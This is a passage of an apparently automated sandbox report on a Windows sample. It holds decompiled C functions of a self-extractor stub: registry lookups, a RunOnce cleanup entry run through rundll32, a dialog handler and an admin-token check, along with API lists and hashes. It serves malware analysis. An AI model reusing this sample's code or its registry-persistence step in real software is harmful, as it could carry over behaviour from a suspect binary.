                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                      • Opcode ID: 100f6a991e1a37f4057fccc3f25983a11e252f731ee0c2751efaf27c9e15c072
                                                                                                                                                                                                      • Instruction ID: 007546da3fa17b389a7d931d7da2b4b453afb0f3aa7f46a17e199cde0425e3c8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 100f6a991e1a37f4057fccc3f25983a11e252f731ee0c2751efaf27c9e15c072
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8341E778E002E4AFD7239F66DC84AAE7BB8EB49344F050759E9456B2D1CB758C01C762
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                      				_t23 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                      							E003E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                      							E003E658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                      								E003E658A(_t61, _t63, _v276);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0x3e1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      											_t45 = _v280;
                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                      											E003E1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								RegCloseKey(_v284);
                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x003e2831
                                                                                                                                                                                                      0x003e28c3
                                                                                                                                                                                                      0x003e28c9
                                                                                                                                                                                                      0x003e28cd
                                                                                                                                                                                                      0x003e2837
                                                                                                                                                                                                      0x003e285a
                                                                                                                                                                                                      0x003e285c
                                                                                                                                                                                                      0x003e2865
                                                                                                                                                                                                      0x003e2892
                                                                                                                                                                                                      0x003e2895
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2867
                                                                                                                                                                                                      0x003e2878
                                                                                                                                                                                                      0x003e288c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e287a
                                                                                                                                                                                                      0x003e2880
                                                                                                                                                                                                      0x003e2885
                                                                                                                                                                                                      0x003e2897
                                                                                                                                                                                                      0x003e2899
                                                                                                                                                                                                      0x003e2899
                                                                                                                                                                                                      0x003e2878
                                                                                                                                                                                                      0x003e2865
                                                                                                                                                                                                      0x003e28a0
                                                                                                                                                                                                      0x003e28bf
                                                                                                                                                                                                      0x003e28c1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e28c1
                                                                                                                                                                                                      0x003e2831
                                                                                                                                                                                                      0x003e27dd
                                                                                                                                                                                                      0x003e27d5
                                                                                                                                                                                                      0x003e28e5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperA.USER32(59D037E4,00000000,00000000,00000000), ref: 003E27A8
                                                                                                                                                                                                      • CharNextA.USER32(0000054D), ref: 003E27B5
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 003E27BC
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2829
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2852
                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2870
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E28A0
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003E28AA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E28B9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003E27E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                                                                                                      • Opcode ID: a6d1c2a688df843c75e64867cf0593c669ec26431c5b8fba0a066e6823f23fd9
                                                                                                                                                                                                      • Instruction ID: c0b4d1fe715807daf67f85a1980b5561480273fd32f4208f7138fd47d211b853
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6d1c2a688df843c75e64867cf0593c669ec26431c5b8fba0a066e6823f23fd9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2741D871A001BCAFDB269B569C85AFF77BCEF15700F0041A9F549D6180CB705E858FA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                      			E003E2267() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v836;
                                                                                                                                                                                                      				void* _v840;
                                                                                                                                                                                                      				int _v844;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t19 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                      				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                      				if( *0x3e8530 != 0) {
                                                                                                                                                                                                      					_push(_t49);
                                                                                                                                                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                      						_push(_t38);
                                                                                                                                                                                                      						_v844 = 0x238;
                                                                                                                                                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                      							_push(_t47);
                                                                                                                                                                                                      							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      								E003E658A( &_v268, 0x104, 0x3e1140);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      							E003E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                      							_t42 =  &_v836;
                                                                                                                                                                                                      							_t45 = _t42 + 1;
                                                                                                                                                                                                      							_pop(_t47);
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t33 =  *_t42;
                                                                                                                                                                                                      								_t42 = _t42 + 1;
                                                                                                                                                                                                      							} while (_t33 != 0);
                                                                                                                                                                                                      							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                      						_pop(_t38);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_pop(_t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x003e2380
                                                                                                                                                                                                      0x003e2380
                                                                                                                                                                                                      0x003e2381
                                                                                                                                                                                                      0x003e2381
                                                                                                                                                                                                      0x003e238f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003E22A3
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 003E22D8
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E22F5
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E2305
                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 003E236E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 003E237A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003E2321
                                                                                                                                                                                                      • wextract_cleanup1, xrefs: 003E227C, 003E22CD, 003E2363
                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 003E232D
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 003E2299
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                      • API String ID: 3027380567-1226499438
                                                                                                                                                                                                      • Opcode ID: 3a4bad1751a664c49e2546ae1778977c56b7105f6d8dc2548f0686e4f59d8643
                                                                                                                                                                                                      • Instruction ID: 2cc18f41027bad7e27c2f430c304ce2aafcb59d837a9224b36daa1c97a7a8612
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a4bad1751a664c49e2546ae1778977c56b7105f6d8dc2548f0686e4f59d8643
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2031B871A002686BDB339B52DC85FDB777CEB15740F0402A5F50D9A0D1DA716F48CE50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                      			E003E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					if( *0x3e8590 == 0) {
                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                      						 *0x3e8590 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                      					E003E43D0(_t33, _t16);
                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0x3e8d4c);
                                                                                                                                                                                                      					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                      					 *0x3e88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E003E30C0);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                      			}










                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 003E313B
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E314B
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 003E316A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 003E3176
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 003E317D
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000834), ref: 003E3185
                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 003E3190
                                                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,003E30C0), ref: 003E31A3
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003E31CA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 3785188418-3940384054
                                                                                                                                                                                                      • Opcode ID: a542c95f7ffba4ab98a03c34b9db796308fff47ee6672f66548e764220037bdd
                                                                                                                                                                                                      • Instruction ID: 9467df76505e9ce7983c0b56263479ccef055476f3b76c7d80c1c4181a29ead5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a542c95f7ffba4ab98a03c34b9db796308fff47ee6672f66548e764220037bdd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6711B4316046E1FBDB336F259C4CBAA3A6CEB4A721F110718F925AA1E0DB70A641D742
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E003E18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                      				_t23 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                      				_t25 =  *0x3e8128; // 0x2
                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					return E003E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E003E17EE( &_v20) != 0) {
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                      						 *0x3e8128 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0x3e8128 = 1;
                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x003e1972
                                                                                                                                                                                                      0x003e1972
                                                                                                                                                                                                      0x003e1975
                                                                                                                                                                                                      0x003e1984
                                                                                                                                                                                                      0x003e1985
                                                                                                                                                                                                      0x003e198a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e198c
                                                                                                                                                                                                      0x003e1991
                                                                                                                                                                                                      0x003e1996
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1996
                                                                                                                                                                                                      0x003e194c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003E18DD), ref: 003E181A
                                                                                                                                                                                                        • Part of subcall function 003E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003E182C
                                                                                                                                                                                                        • Part of subcall function 003E17EE: AllocateAndInitializeSid.ADVAPI32(003E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E18DD), ref: 003E1855
                                                                                                                                                                                                        • Part of subcall function 003E17EE: FreeSid.ADVAPI32(?,?,?,?,003E18DD), ref: 003E1883
                                                                                                                                                                                                        • Part of subcall function 003E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,003E18DD), ref: 003E188A
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003E18EB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 003E18F2
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 003E190A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 003E1918
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 003E192C
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 003E1944
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1964
                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 003E197A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 003E199C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 003E19A3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003E19AD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                      • Opcode ID: ce8ea5167f17d8420f9cb2235e8029f9db3657131150507326f0952c8430a4c1
                                                                                                                                                                                                      • Instruction ID: 564dfa0dce1f557878e0ade4ad8c0cb8109ea46e3dec301a519b885ddaa240b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce8ea5167f17d8420f9cb2235e8029f9db3657131150507326f0952c8430a4c1
